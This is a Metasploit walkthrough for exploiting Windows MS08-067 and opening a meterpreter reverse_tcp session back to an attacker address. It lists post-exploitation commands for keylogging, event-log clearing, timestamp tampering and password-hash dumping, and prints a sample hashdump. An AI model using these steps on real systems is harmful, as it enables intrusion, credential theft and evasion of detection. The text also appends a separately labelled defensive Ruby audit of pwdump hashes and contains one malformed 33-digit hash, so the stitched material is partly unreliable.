
Pre-installation steps on Ubuntu: http://www.metasploit.com/redmine/projects/framework/wiki/Install_Ubuntu

Download and Unpack

Verify that the ruby package is installed on the machine.

Download the Metasploit package from the following address: http://www.metasploit.com/framework/download

Download version 3.X.

Once downloaded, unpack it and change into the msf directory.

For this exercise, change into the /pentest/exploits/framework3 directory and update the framework by typing:

svn update

CONSOLE MODE
Run the framework in console mode:

./msfconsole

Use the following command to get to know the package:

msf > show exploits

Target: MS Windows

The activity uses the exploit windows/smb/ms08_067_netapi. To carry it out, run the following commands:

./msfconsole
msf > show exploits
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set rhost direccion_IP_victima
msf exploit(ms08_067_netapi) > show payloads

Once the payloads are listed, select the meterpreter payload:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

Then select the attacker:

msf exploit(ms08_067_netapi) > set lhost direccion_IP_atacante

To check that all the values were set correctly:

msf exploit(ms08_067_netapi) > set

Finally, run the exploit:

msf exploit(ms08_067_netapi) > exploit

METERPRETER
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    execute       Execute a command
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    enumdesktops  List all accessible desktops and window stations
    idletime      Returns the number of seconds the remote user has been idle
    keyscan_dump  Dump they keystroke buffer
    keyscan_start Start capturing keystrokes
    keyscan_stop  Stop capturing keystrokes
    setdesktop    Move to a different workstation and desktop
    uictl         Control some of the user interface components

Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

EXAMPLE:

meterpreter > hashdump


Administrador:500:fd339fb80b44d34564c3113b4a1a5e3a0:14348077370769d30e68ce81549849c0:::
Asistente de ayudaM:1000:9a379af252bf73ee05617bba465241fb:b2c7cce470a5f7f5422984b8cf3d5292:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0?:1002:aad3b435b51404eeaad3b435b51404ee:6e88c8b50b58f1981cec8b033c631ef4:::
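
The hashdump output above uses the pwdump layout user:RID:LM hash:NT hash:::. The following is an added example, not part of the original document or of Metasploit: a Ruby audit that reads such lines and reports accounts that still store an LM hash or have a blank password. The function names and the sample lines are constructed for illustration; the two constants are the well-known LM and NT hashes of an empty password.

```ruby
# Added example: audit pwdump-style lines (user:RID:LM:NT:::) from a defender's view.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee' # LM hash of an empty password / LM not stored
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0' # NT hash of an empty password
HEX32    = /\A\h{32}\z/                        # each hash field is exactly 32 hex digits

# Parse one line. Returns a record, or nil when a field is malformed.
def parse_pwdump_line(line)
  user, rid, lm, nt = line.strip.split(':', -1)
  return nil if user.to_s.empty? || !rid.to_s.match?(/\A\d+\z/)
  return nil unless HEX32.match?(lm.to_s) && HEX32.match?(nt.to_s)
  { user: user, rid: rid.to_i, lm: lm.downcase, nt: nt.downcase }
end

# Returns [[user, [issues]], ...]; an empty issue list means nothing was flagged.
def audit_pwdump(text)
  text.each_line.map(&:strip).reject(&:empty?).map do |line|
    rec = parse_pwdump_line(line)
    if rec.nil?
      [line[/\A[^:]*/], [:malformed]]           # report, never guess at bad fields
    else
      issues = []
      issues << :lm_hash_stored if rec[:lm] != EMPTY_LM # weak legacy hash is on disk
      issues << :blank_password if rec[:nt] == EMPTY_NT # account has no password
      [rec[:user], issues]
    end
  end
end

# Constructed sample input (not taken from any real system).
SAMPLE = <<~DUMP
  alice:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
  guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc backup:1002:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
  broken:500:0123456789abcdef0123456789abcdef0:fedcba9876543210fedcba9876543210:::
DUMP

if __FILE__ == $PROGRAM_NAME
  audit_pwdump(SAMPLE).each do |user, issues|
    puts format('%-12s %s', user, issues.empty? ? 'ok' : issues.join(', '))
  end
end
```

Accounts flagged with lm_hash_stored call for disabling LM hash storage and a password reset; blank_password accounts should be disabled or given a password.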
